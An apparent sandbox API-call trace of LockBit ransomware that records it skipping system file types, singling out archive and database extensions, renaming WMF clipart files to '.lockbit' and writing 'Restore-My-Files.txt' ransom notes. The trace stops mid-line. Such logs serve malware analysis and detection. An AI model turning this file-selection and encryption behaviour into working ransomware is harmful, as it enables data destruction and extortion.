[0150.428] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.428] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.428] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.429] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.429] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198113.WMF.lockbit") returned 72 [0150.429] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198113.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198113.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0150.430] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.430] malloc (_Size=0x40068) returned 0x3ef0008 [0150.430] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=42272) returned 1 [0150.431] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.431] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0150.431] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0150.432] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.438] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198113.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198113.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.438] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.438] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.439] free (_Block=0x1fa2ed8) [0150.439] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198113.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.439] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.439] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.439] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6600bcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa3b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198226.WMF", cAlternateFileName="")) returned 1 [0150.444] lstrcmpiW (lpString1=".", lpString2="J0198226.WMF") returned -1 [0150.444] lstrcmpiW (lpString1="..", lpString2="J0198226.WMF") returned -1 [0150.444] PathFindExtensionW (pszPath="J0198226.WMF") returned=".WMF" [0150.444] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.444] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.444] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.444] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.444] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.444] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.444] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.444] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.444] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.444] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.444] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.445] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.445] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.446] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198226.WMF") returned 1 [0150.446] lstrcmpiW (lpString1="ntldr", lpString2="J0198226.WMF") returned 1 [0150.446] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198226.WMF") returned 1 [0150.446] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198226.WMF") returned -1 [0150.446] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198226.WMF") returned -1 [0150.446] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198226.WMF") returned 1 [0150.446] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198226.WMF") returned -1 [0150.446] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.446] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198226.WMF") returned=".WMF" [0150.447] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.447] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.447] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.448] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.448] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.448] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.448] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.448] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.448] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.448] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.448] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198226.WMF.lockbit") returned 72 [0150.448] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198226.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198226.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0150.449] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.449] malloc (_Size=0x40068) returned 0x3e70008 [0150.449] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=41906) returned 1 [0150.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.450] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0150.450] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.450] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0150.450] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0150.454] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198226.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198226.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.454] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.454] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.455] free (_Block=0x1fa2ed8) [0150.455] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198226.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.456] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.456] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.456] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56536e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa69e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198234.WMF", cAlternateFileName="")) returned 1 [0150.456] lstrcmpiW (lpString1=".", lpString2="J0198234.WMF") returned -1 [0150.456] lstrcmpiW (lpString1="..", lpString2="J0198234.WMF") returned -1 [0150.456] PathFindExtensionW (pszPath="J0198234.WMF") returned=".WMF" [0150.456] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.456] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.457] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.457] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198234.WMF") returned 1 [0150.458] lstrcmpiW (lpString1="ntldr", lpString2="J0198234.WMF") returned 1 [0150.458] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198234.WMF") returned 1 [0150.458] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198234.WMF") returned -1 [0150.458] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198234.WMF") returned -1 [0150.458] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198234.WMF") returned 1 [0150.458] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198234.WMF") returned -1 [0150.458] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.458] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198234.WMF") returned=".WMF" [0150.458] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.458] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.458] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.459] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.459] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198234.WMF.lockbit") returned 72 [0150.459] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198234.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198234.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0150.460] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.460] malloc (_Size=0x40068) returned 0x3df0008 [0150.460] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=42654) returned 1 [0150.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.462] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.467] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198234.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198234.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.467] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.467] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.469] free (_Block=0x1fa2ed8) [0150.469] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198234.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.469] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.469] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.469] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56536e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6f9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198372.WMF", cAlternateFileName="")) returned 1 [0150.469] lstrcmpiW (lpString1=".", lpString2="J0198372.WMF") returned -1 [0150.469] lstrcmpiW (lpString1="..", lpString2="J0198372.WMF") returned -1 [0150.469] PathFindExtensionW (pszPath="J0198372.WMF") returned=".WMF" [0150.469] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.469] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.469] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.469] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".theme", 